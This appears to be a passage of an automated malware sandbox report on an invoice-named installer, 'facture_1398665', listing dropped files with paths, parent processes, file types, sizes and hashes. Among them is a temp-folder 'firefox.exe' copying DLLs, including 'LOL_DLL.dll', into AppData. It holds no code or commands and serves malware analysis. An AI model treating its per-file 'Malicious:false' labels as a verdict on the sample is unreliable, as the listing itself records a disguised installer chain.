SHA-512:1FDC1170907346EF0ECED900DE9091136A6626C4BFC8B4416DFEBBE356F35F9C2BE0D2CF6C37E3DD231F3DB8B5A3AFE8973F15A45544C0C1C10682FE03911616
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ARJ01.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):20672
Entropy (8bit):7.0106564368261175
Encrypted:false
MD5:1622347A34EBA068916713CF28F46B67
SHA1:18B3960E88118195F17C4BEF47DF1F7935CEE459
SHA-256:9766C4200B3F51630097FCE8D4F10B33383E663601802ADA72660604876C99E9
SHA-512:90B2398918487E0CCFE8F859AEE6E729A4063A110204644A75649331F10895B6C4DE09E57B6E20E8FAC04AC413F54A82889E602D05F5F42690B87D9C2253FA2E
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BKEF7.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18624
Entropy (8bit):7.163311181625049
Encrypted:false
MD5:CB4E401CE4FC657CCEBB85F96840CC8B
SHA1:359910F84B5FAF0D194D534C2F631DB5074EA28D
SHA-256:B90BFFA9E03FFD4ECF1D0D709C60F61D13490E84C4550EF06586BC9B1024ED00
SHA-512:382DF8909DC347DD86696756CD22650EE9BE45146FFDF3B400DA4E370C7C42BCDD4C7FDB807E5A9161211B975B9750EE6CB2B2E2132AAD9D3F90DB9956C2275E
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BVQS8.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18624
Entropy (8bit):7.132065899718217
Encrypted:false
MD5:B53D96644F5774FE29BA8BB12D6E5F66
SHA1:260CBBADA90E29EE8E308996E973CE635496D53C
SHA-256:BE19250A19ED49CE247999D6F0B953EDC2AB7C66B46F1CFBD0C24BE91B84B297
SHA-512:E894CAE26EA86325A9012EC2A00086E136AFE64F38F8DA8B3C5EE1CCAD87B1DCF502AD41E050C1ECFBC1C45D2C69A3C35C5322765EF92DDAF00E5E9953F3436F
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-CPP49.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):20672
Entropy (8bit):7.088938940487771
Encrypted:false
MD5:41A0D67BA3833D230F1229FF058BE057
SHA1:A66FDA76D97D059067F11C3E03869A1B9DA439A0
SHA-256:4F11443A2FA6C714D3E33597F0D08DE4E11A6A2FDB7DE2E4A01ADDD5977665C5
SHA-512:A4138CC25AC899059A702F4E078E7662F15B7059089E53B6EB1A78A1BBEBC03704421BDD0A5FCBDFFD48BE2842D587E4E3E56D881F0462F60CDDC5C75FC14F2F
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-E6HJR.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:ASCII text, with no line terminators
Size (bytes):11
Entropy (8bit):2.5503407095463886
Encrypted:false
MD5:E930CCBB2F833479DD58E27A9288E128
SHA1:D58BDF26572FD015652227C9DF78AA345F4A1F80
SHA-256:F039C6C3630501F9476043356BA47B050AFDE8D534438A7E3A7135D792484932
SHA-512:3E42C62699C0B5D2343E6FE872B11D3AD8D75104F946EC09AA48B129F3C090EDCEC9FFAEDF143AF478838E515E4D4C14FE45390C9E3ED24A1E9EB0FC3F965A06
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ENSEN.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):19136
Entropy (8bit):7.07970746470874
Encrypted:false
MD5:93FD7C2F4A8007521E2D1A73B6C21E6F
SHA1:FA2F6A112876613C8DB0276644F229F0C13EDAD1
SHA-256:3737D7875668EB4812AB01FE82226D758D480128C76BC234806BFD40694CF048
SHA-512:2390C17625E3377980E0B267E14EF572CF0E88F30A392C7E64A941F2FA98ED9D054B06ADC583FB44CD777D610F7F3CC4D5D26982D297D7DF938263F92AD5A876
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-EOC8V.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):25792
Entropy (8bit):6.781766293773302
Encrypted:false
MD5:66F65B59DFF2F8927DC3C8045D8C3A0A
SHA1:AE459D1B4D6615587D8B9133EC72162C717287FC
SHA-256:414A2BD84B042E2CCF758270647BCFA02D78EB0125C0584DD53F7245481D66B9
SHA-512:4FA559F7E3B423A736081A67C8A19084288A870307547B19B2DCCAD935AFDC56311A2045CEB4791D1CA33A05F7F1F906C21363A2076436431A118667F298D577
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-F0F55.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):24256
Entropy (8bit):6.8602671281732635
Encrypted:false
MD5:E65F76759251845FA1E6A3CF41B5F231
SHA1:DE4517EB0D8B330D3C2717E786F485150CAF82EC
SHA-256:034A8ABF2BF027AD950FDF8FBDF488188C8D02EBA8E160AA95DE376FF1F32FE6
SHA-512:AFC7D0A26B2FFEFB43846D621585FC35A2CE280EEF1D046DA5A327F20AE7B023CCEB2BFD64176787AB86A76567E233215427686243E62ECA5DED1AD14B19B5B5
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-H27TI.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18624
Entropy (8bit):7.135353533119842
Encrypted:false
MD5:2674310F6FC087862B215B26A5D6DA5B
SHA1:6E226A29124716FB6C5C54CBBF3C2B6F727C9E5A
SHA-256:E29EAA099BE15958CB65D03D47959CAE2DAC342402856C5F0E4DA672193C329D
SHA-512:86964E2A71A32D7FD0C6F3061ECBE66DD10D4938E0F5E3572F962B53107524259F62001BDFF7E4C9173A6B8270F46B76C1037DC69B8343F10E4B4E59BD8D6782
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-HRJGD.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):17600
Entropy (8bit):7.2077822511556215
Encrypted:false
MD5:405BB6A7CD56CBF5276C3A8DC631963D
SHA1:B4CF791ACE3F6790D45B54A0E6AEB6EBAC748C97
SHA-256:F654E56C4299F507BC34271B6BAA29290FD4919B853E17D7470596CAD779F063
SHA-512:EC892ECE3EB6A211BB8A03F5C5FEBDC4D2F6667079E38A17E3D59195D519E95B03063A3957D4F1180B232A67A2487F8A2D3D2F9312390FEABBD78FADAD1E9FD4
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-IEU03.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18624
Entropy (8bit):7.081899405376927
Encrypted:false
MD5:F4604E259459F5A0D5BE6914A6D4C5FB
SHA1:E17011A4C93F88D558A3DD606D99E78FC58837E2
SHA-256:BCE066193FEB60B08EDF4CBEB490AAAA5DFFEB8A63A720CADF948748A9AF4B8F
SHA-512:3320207D4E2B25C0B77062DF7A7D9761CA04E92D08E1435F2FA0CD040C7631C02BADDC8926475AE109284BC78DA5C16840B439D29A17C47792123350746E2461
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-J5TU2.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):19136
Entropy (8bit):7.067790575145041
Encrypted:false
MD5:E4D419A1897B507E01F75EF88457979F
SHA1:5C769D5E7FCECBF384D09F340E7DCEB951A2F9C6
SHA-256:3A2355A23874342777391B4A06C5CDCD990DED287CC4A27FDF0A071AC3B229AD
SHA-512:65EDB60FD6E897EE2AC74976C47A8B55B8C45BB707C8F1134D78517D0883A16634A3C6142F3A925BE0441D594EEBE90149675D38E4A8DF23D6A68F163F60E611
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-K7B63.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):17600
Entropy (8bit):7.194045699834861
Encrypted:false
MD5:0AE94670FBD69ED5F8C923B75CE2C0BD
SHA1:ED53B6E73B867E23881244926B0DEA1524515672
SHA-256:6D541B215CFA452E54DC6AF9317A7FC24043FA465EF2B561E0F245A4870B2705
SHA-512:64886E61537830F013A576E40F83D5BC057EFBAB1F3839D5F30A98CBEAAE62F916EF2AFBA6EC9F7CEFDA89907DDA9F704105CAE59CB880F8148F34F3F011562B
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-KMNP5.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18112
Entropy (8bit):7.094588451141472
Encrypted:false
MD5:1B5A116DAF8D01FDD0488666803DB17F
SHA1:DA47F3A722A75AE04662B5A6C486DEC6AE7379EA
SHA-256:48D491B08D395A8AC47CC22A70D1C3F5E84D716AFE2678E825F24492E8FF2ED4
SHA-512:4E4FDF0AEF5DD17F314A4B93AE521FD3E9E6B5C06EE17688DDEB280BA5C42FC72C75DB745B83ECEB740E5A747C0ABE07627457D6CCB0692DC5E65C96BDE96509
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L6BIN.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18112
Entropy (8bit):7.177990634000795
Encrypted:false
MD5:0AEAF9CE58CBD0AF1E30D03B45C21F81
SHA1:1EC04DCA23EB4D28861A16D5CCA0D4FEB91E2E32
SHA-256:9A5952C82CBCB1A8ECE9C51C258667D9AB96D13EC6455873999FF0BF78C3CAB0
SHA-512:49F9D30694F6C272E6CB84F71B3801DFF5256D25AC9479ACC6577038783E8B62E36BD0A5A8D07E618830E64749F92DEE0454DD88E132B333D558319FB282EF7A
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L7E6Q.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):22208
Entropy (8bit):6.921271327164854
Encrypted:false
MD5:BC0BE695E63548171105C57D2E9B98E7
SHA1:0C4506B330487C4B45900B06DFE0A3249F6B9D88
SHA-256:D16C5B0E19870E86354B5E6CDC4C81E80777749F6BBE6B675F680CEC0FFAE35D
SHA-512:095EF210F55233A0C0EB80FC2D94646DE96CB2E66D1994D631FA82E5A71A5C26B32D33ABC19AC69E64BD3E4789EB1A7595818A90494038EA1771C210CD81CB2A
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-LQISF.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18624
Entropy (8bit):7.081538661952178
Encrypted:false
MD5:6BFBF95B7253F32A77BACDF119B678F3
SHA1:3E3522A9D62940E1E3C0ED6F785AF0B5E3A33600
SHA-256:9FC2486ED5D3FFF78DEB69A7386F4575451D43B67F759AFB056AC66B82041E3D
SHA-512:603A5A199A19028B2E496051772517C488FD3FCC05DD6BEC51E15C58DAD2981F7DAB44C3D7E1BE836AFE8F3CF35AC90E574F0062737C353079E33096DBA26F10
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-MQDR2.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):20160
Entropy (8bit):7.084485679603242
Encrypted:false
MD5:07BA5F40C64134E5749DF0E8CFEE082E
SHA1:5B872A7EA316B6B3BA604B88045B9B6F34BA4C8B
SHA-256:136E5DE4B535AABF6368C06F82339D2EF6C34165661F40433BCEF4EBB90B30FE
SHA-512:55B5C739D08F5627D9453709CC0D3D20C3FC08E9A1168F70381B49F8FDC8D91F15DB85DB51D47AAAE612CBE920BB3BA83075E74888B2D62E3A962F181B3D2C12
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NGCIJ.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18112
Entropy (8bit):7.1097867214760235
Encrypted:false
MD5:0A0084D4B3635E4D8EBAB587DCFCC16C
SHA1:5619483328D58AD6B4D2A8A860DABED1BBDB8091
SHA-256:5089484C8C56AC8E095CADC3DC971DF71EDEB52F856940632821FD37E81AE5CA
SHA-512:D50989131E3B66335F9972E46D056FF1CE585AC90877C388B35BC66E285D24CC4FBC6688F62543CAF3DF86D3E3D1087BDC2822C9F69B0978E35BB727FE47B58B
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NOVNE.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):17600
Entropy (8bit):7.201487233811755
Encrypted:false
MD5:E205DE17A85B0C3352A6857EF9B3C6DD
SHA1:5FE8A292A9D6653136F612FE2C9B45F2F1B08C96
SHA-256:29B23370474BE0C459CC47863603167CC7191F58318BD29877225FCBF2454215
SHA-512:6279922FCB3ACCBAC15406815DDC557735346245172285CF1C368434B45C9EFBAFDF8215CE6112292BFD4B2C8EB4642A0560CAE17337D6F51D86137C41B12D6C
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-O6IQ7.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18112
Entropy (8bit):7.167129892042716
Encrypted:false
MD5:87B1814412CDAC3D08FAD8DD3A79EBAD
SHA1:CA1946721D023BE9825A5AFAC4364248A56111E1
SHA-256:2F4690B3C2587C0BFB81AB701D50E497406994613151FAF007423C59CA5E2281
SHA-512:999D6EEB454760A422FAB3B1F1D3DE6B99789838FDFE88F78A3AF52842672F67BB4CA05AE157BF68CEE6D96A1F4B0924555DA67A4FFAD9DB9044E411E071D206
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QD0HG.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18112
Entropy (8bit):7.169892235758202
Encrypted:false
MD5:FD14FCD1550F17701FBF239645B606FA
SHA1:0D7B1DE80DB94DABAD3CE91D31FDA1A8A1A6CFAB
SHA-256:A5453CD2B5E98D40CA17DD20A8F5974F29DE7236A076867A3BC3CBCA441BE928
SHA-512:162559D9E6E36BFFE32BE41F75075E711E6947ADAB2AD3BB37CF03E02E787AD5A6F3FB93AF4B6C3F82E1107DC401D32DBD53FCBA39F85839910E852C1109DB5B
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QG57B.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):19136
Entropy (8bit):7.06770071137197
Encrypted:false
MD5:87E0EF2D5DF6F6E18E6EA9171E3D77E7
SHA1:EB6A1D8D169A683BD1357877AC94BFC98799FEEB
SHA-256:9B5A5536AED84D45A00DA1056AF4762FEC805EABA742C6BF2D2FCA60993711BB
SHA-512:AB0CB69F13793604E7D3BB97D6CEE38CCA0CDB4889C10F228119713902211C0AEB8A493307FAAC614D05A669BD2E172D83C0AED494751D50DE1874D4AA90D379
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-R06PT.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:JPEG image data, JFIF standard 1.02
Size (bytes):22117
Entropy (8bit):7.966262180259871
Encrypted:false
MD5:2EACE55C93918524BD2F8F06B4DDBEB3
SHA1:8EB9A69D877C96603C2F26E895BF1DC89CF1927E
SHA-256:667BE8442298610861B8561DA6E2F4005857D0AB076A3A8FF578D9B7E3DA729E
SHA-512:DE0D89C1AC2C5C99B8607E49D2F6AE7D6BE79748BE71DE5A74B6A193A92E4CB0C600230A3893AA9C595CB3632051876507F527EB4155FFFFA1A5E253EDC21755
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-RQQDV.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18624
Entropy (8bit):7.128506970533883
Encrypted:false
MD5:8F239C629F09E1B49CF1F03304AB8E69
SHA1:D54DBE7E79A8389B3BAE3273487BC22D4B99781A
SHA-256:D8D74FB87F94A587582D56934816362B992B712E47C39F13D957058F17724886
SHA-512:130D1BB38C757BBCE7B3C558624028C771FA1198B8D02F0BE1F210A688E5779F8FCBB44154678E898D6FBA4EC31D03664CC84D063816E977361D4ECABAD7911E
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-S9A25.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):20160
Entropy (8bit):7.084664816938566
Encrypted:false
MD5:066874FF22E1C100DC56C4AE76D2E1C2
SHA1:896031A6BB845525A6AAB4B56A4DB2805E797A65
SHA-256:979FF0E25E7EA00B8714C9EF2DC8417E69AFAC137EA88F77F8F5A9FFEAA31923
SHA-512:0DCF7F1956C980CDBBA6279C7E4D80F30D85AA37D3507166E0B67F008FCFABD00CB8E27532A362218EF3EBF66D92CA3D97A23D1028B83DFFE36AA6E953F3D83E
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SJFE0.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):19136
Entropy (8bit):7.06799010155914
Encrypted:false
MD5:1A16AB59D63A2D6A37D3ABD032958631
SHA1:FC76579F19ABB0F24E1AFEA30E1C85FFED6CBC0F
SHA-256:81926C2B97A7B01061C5042DA0005F0B64FE9E07852478B2A65E8A8EB5560B1F
SHA-512:F3808B1566193AA9024B30477A530CD616174E8B310D455A368F89B2BC6C90D998F4CC611030F7801CBBEB3598DDF78968D628C56C44ED1631A3262159AFD4D7
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SNF6L.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):28864
Entropy (8bit):6.66295566360206
Encrypted:false
MD5:49A69484B524C6F9FD641E015DD15154
SHA1:F6EC9E38D05ED66E8431B909ABA0451EF8C9B540
SHA-256:69C637C0BE7DDFE0690D8C642EC6D0850085617C3C3DDA9531CAC818F06F66E8
SHA-512:802D186F4B580541916C038999C0653765F2CB01C345549F6D927F7688B671B234C7EE05F2A9EBA6C139F25C459E579DA4437EE2AC03ED3FE3EBEF849F178553
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-TLFG5.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes):531408
Entropy (8bit):6.731849192407803
Encrypted:false
MD5:52FFABA4273678BAE75442F2BC85B470
SHA1:66A4C6CF92A4190A1480FD2B19AC84952FA715BD
SHA-256:70225F14A28007815B0410B1F41F7EA6A16B6329FD69F7EC06386B05862CF5C4
SHA-512:4D6E222378CC99B7CA64EC6738B97504201364760E94BA0276F272860608952E5A260B70A28246D6857404209C7B2ECEFD0C22EBA59B3788069DA7A1B39266F2
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UJ2Q7.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18112
Entropy (8bit):7.1620766534253555
Encrypted:false
MD5:AD895B2A99A3EC18F1690BBAC1E2037A
SHA1:19FAB11CA8D2AB4A3C1A863209CBDC77A69E1AED
SHA-256:A11C772B2451B0C9C706B03381819E4A1DEF3E2FBBBA8362509BBE57DBD5C666
SHA-512:D021A5B8451BB8BAC27B4F496A1A25E0A2B2F90C93A7E27850303C5FEB9441F9B926B13EF024C176827E190F2DC04F401205983510DFAB0946674D18994BBE8F
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UPNUP.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):22720
Entropy (8bit):6.942253423928934
Encrypted:false
MD5:11218C9F81404A51D1EB6B56BA60F9AB
SHA1:ACC303D1B1A5822ED7BCF8F666860A0A7AAFFE91
SHA-256:882DA90B6368056908E9CD21C4719A016E9A3CA597ECA9183892A5806B4A8D4A
SHA-512:86928D70AEC7BD7170863C0CDEA110F8A4AA244EFB30577310AD1908D71817B8A2AEB45833D5F710B15DF8FE096234CFB069819B0F2B706CFCD15B5614615929
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-VQCNU.tmp
Process:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):112640
Entropy (8bit):7.499598784189305
Encrypted:false
MD5:8272DAAC35E741D2F9CE6E67745BD1BC
SHA1:7E0C542E73F12EA50797E2D8B22C461046111109
SHA-256:2216259093B9BA13859287AA6944B1F0341C80386E55294583A27A2542FC99F9
SHA-512:8AB688A50C8C8045239484B41EA8F03CD06A1100BC375A3684677B55EC22F613CF79B360AC84DAB82F7E62285832667DC338BF8A10EF78F4C23F6EA059C54892
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
Process:C:\Users\user\Desktop\facture_1398665.exe
File Type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes):1228800
Entropy (8bit):6.459892876394132
Encrypted:false
MD5:9AE8DFC6C5CB2222DBD09F1176058373
SHA1:28A62A8262AC325E800DA8363F00511503E569B3
SHA-256:489D6308B6B6109E76D132586BA861E1F4ECCBB814AB68FB1DCD2944D6787FA4
SHA-512:289C2A884CB8C1C37F5CF8BCDAC5BE5813A02402267749B69DD1820BBF401A6DB3D8913A7695B93E1B2CFF306730AA829DBF0DA0B443B63C58719DC4672F65AE
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Process:C:\Windows\System32\dllhost.exe
File Type:Microsoft Cabinet archive data, 6509 bytes, 1 file
Size (bytes):19527
Entropy (8bit):7.96414732129194
Encrypted:false
MD5:DA4ABC8C9A1FCFA4161EFE06CB2935AF
SHA1:E33672FBA3E351EF2BB6F0C62DB1A5C3EEA0A1F9
SHA-256:C25B1A0AFC65B15A4B2278A85B519A33164987284C71BDA4D848D852CC25DB46
SHA-512:2E59E847EBFDD74F752CD6E974075EA69B5DAA7AA5CEA092DE9C5BB35BB8748905CCEA7C7B041D7C30847EAB0FF6FFB58E4E18217F7B9457E426188C07E1375F
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Process:C:\Windows\System32\dllhost.exe
File Type:data
Size (bytes):1026
Entropy (8bit):3.129049618580033
Encrypted:false
MD5:4F11D774C041FCB39FD9772B4B92575D
SHA1:74E0705B4B8E6703C981BDAC48C17D12CE86C800
SHA-256:56FA377E0CCDF9258C71FC909DFB070A2A0F0D9ABB8E15FB375D972D9AD700BF
SHA-512:70D51E4931BFC3096FCD0536161CAAFCDA703C04BF5C197055E43CACBAF476D3F01441E9F09BF869B9D9793B5896C5ED00E98D26BE740299333839142D9CB9C6
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\LOL_DLL.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):112640
Entropy (8bit):7.499598784189305
Encrypted:false
MD5:8272DAAC35E741D2F9CE6E67745BD1BC
SHA1:7E0C542E73F12EA50797E2D8B22C461046111109
SHA-256:2216259093B9BA13859287AA6944B1F0341C80386E55294583A27A2542FC99F9
SHA-512:8AB688A50C8C8045239484B41EA8F03CD06A1100BC375A3684677B55EC22F613CF79B360AC84DAB82F7E62285832667DC338BF8A10EF78F4C23F6EA059C54892
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-console-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18624
Entropy (8bit):7.081899405376927
Encrypted:false
MD5:F4604E259459F5A0D5BE6914A6D4C5FB
SHA1:E17011A4C93F88D558A3DD606D99E78FC58837E2
SHA-256:BCE066193FEB60B08EDF4CBEB490AAAA5DFFEB8A63A720CADF948748A9AF4B8F
SHA-512:3320207D4E2B25C0B77062DF7A7D9761CA04E92D08E1435F2FA0CD040C7631C02BADDC8926475AE109284BC78DA5C16840B439D29A17C47792123350746E2461
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-datetime-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):17600
Entropy (8bit):7.201487233811755
Encrypted:false
MD5:E205DE17A85B0C3352A6857EF9B3C6DD
SHA1:5FE8A292A9D6653136F612FE2C9B45F2F1B08C96
SHA-256:29B23370474BE0C459CC47863603167CC7191F58318BD29877225FCBF2454215
SHA-512:6279922FCB3ACCBAC15406815DDC557735346245172285CF1C368434B45C9EFBAFDF8215CE6112292BFD4B2C8EB4642A0560CAE17337D6F51D86137C41B12D6C
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-debug-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):17600
Entropy (8bit):7.2077822511556215
Encrypted:false
MD5:405BB6A7CD56CBF5276C3A8DC631963D
SHA1:B4CF791ACE3F6790D45B54A0E6AEB6EBAC748C97
SHA-256:F654E56C4299F507BC34271B6BAA29290FD4919B853E17D7470596CAD779F063
SHA-512:EC892ECE3EB6A211BB8A03F5C5FEBDC4D2F6667079E38A17E3D59195D519E95B03063A3957D4F1180B232A67A2487F8A2D3D2F9312390FEABBD78FADAD1E9FD4
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-errorhandling-l1-1-0.dll
Process:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):18104
Entropy (8bit):7.131532401171639
Encrypted:false
MD5:9A4FC3727AAF02C3285B47DF5EE56244
